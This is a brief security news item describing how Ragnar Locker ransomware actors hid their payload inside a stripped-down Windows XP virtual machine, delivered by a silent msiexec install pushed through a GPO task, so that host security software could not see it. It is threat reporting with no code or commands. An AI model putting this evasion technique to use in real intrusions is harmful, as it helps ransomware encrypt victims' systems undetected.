Threat actors have developed a new type of attack method by hiding Ragnar Locker ransomware inside a virtual machine to avoid detection
Ragnar Locker ransomware attack that “takes defense evasion to a new level.” According to the post, this variant was deployed inside a Windows XP virtual machine in order to hide the malicious code from anti malware detection. The Virtual Machine includes an old version of the Sun xVM Virtual Box, which is a free, open source hypervisor that was acquired by Oracle when it acquired Sun Microsystems in 2010.
“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,”
The MSI package contained Sun xVM VirtualBox version 3.0.4, which was released August of 2009, and “an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82.” In that image is a 49 KB Ragnar Locker executable file.
“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,”
This was the first time seen virtual machines used for ransomware attacks.
It’s unclear how many organizations were affected by this recent attack and how widespread it was. In the past, the Ragnar Locker ransomware group has targeted managed service providers and used their remote access to clients to infect more organizations.